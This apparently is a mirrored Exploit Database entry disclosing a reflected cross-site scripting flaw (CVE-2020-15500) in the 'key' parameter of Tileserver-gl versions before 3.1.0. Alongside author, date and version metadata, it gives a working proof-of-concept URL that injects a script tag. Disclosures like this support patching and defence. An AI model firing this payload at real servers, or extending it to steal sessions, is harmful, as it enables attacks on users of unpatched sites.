Tileserver-gl 3.0.0 – ‘key’ Reflected Cross-Site Scripting (XSS)

• Exploit Database
• 32 阅读

• 作者： Akash Chathoth
  日期： 2021-04-15
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/49771/

• # Exploit Title: Tileserver-gl 3.0.0 - 'key' Reflected Cross-Site Scripting (XSS)
  # Date: 15/04/2021
  # Exploit Author: Akash Chathoth
  # Vendor Homepage: http://tileserver.org/
  # Software Link: https://github.com/maptiler/tileserver-gl
  # Version: versions <3.1.0
  # Tested on: 2.6.0
  # CVE: 2020-15500
  
  Exploit : http://example.com/?key="><script>alert(document.domain)</script>